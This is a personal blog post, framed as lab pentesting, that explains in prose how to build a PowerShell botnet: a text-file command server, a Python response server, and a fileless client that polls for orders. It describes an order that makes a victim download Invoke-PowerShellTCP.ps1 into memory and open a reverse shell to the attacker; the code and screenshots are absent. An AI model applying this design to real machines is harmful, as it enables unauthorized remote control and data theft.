Total Pageviews

Saturday, July 31, 2021

Powershell Pentesting: Make your own Botnet [I]

 Hi everyone welcome to my first summer post,  I hope that so far so good ;).


On this entry of my personal blog i'm going to explain how to make yor own personal botnet using powershell over windows Operative system machines.

The architecture design of the Probe of context could be samething like that:




As you can see on the  previous image the architecture design contains a client side and server side.

On the server side, we can find two diferent process that execute like a service on the attacker machine:

1. Bot-server: this process is the orchestrator of the instructions arround the botnet

    1.1 This server contains the  bot files with the orders that the attaker is going to send over the tcp network and could work on two differents modes:

        1.1.1Single order: In that case the server send an unique oreder to a specific bot-client

        1.1.2 Boradcast order. In that case the server send one order over all the clients of the botnet at the same time.

2. Response_server: this process is use for recieve the responses of the clients side, with file content or execution logs.

On the client side only one process is worked over server memory withou write files on the operative system,using the fileless concept all the process is execute on the server side memory.


TECHNOLOGIES::

1. Server side:

    1.1 Bot-server: Apache web server and text plain files

    1.2 Response-server: Python3 http server

2. Client-side:

    2.1 Powershell  script 


HOW ITS WORK:


The execution sequence orders of our (PoC) botnet: 

1.  The bot-client connect over tcp using http request with the bot-server and ask for the next instruction to execute.

2. The bot-server provide the next instruction to execute to the bot-client.

3. The bot-client execute the order and store the response on local memory

4. The bot-client send the response with attachments to the response server


ARCHITECTURE REVIEW OF THE SERVER SIDE 

__Bot-server _structure




Server command example:

The previous instruction force the client(10.0.2.3) to download a powershell ps1 function (Invoke-powershellTCP.ps1), load the function on dynamic RAM memory and execute it in order to spawn an interactive shell to attaker (10.0.2.4) machine:





The server Response source code on python3:




Execution:




Stored logs files:





ARCHITECTURE REVIEW OF THE CLIENT SIDE


Client side powershell source code initial version botnet[I]:





POC EXECUTION:

1.0 Execute a single command from server side to client side





2.0 Spawn a cmd from victim host to attacker machine






3.0 Spaun a reverse powershell from client side to server side







And this is all, for this session.

I hope that this entry would be interested for you, best regards 

f0ns11


at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...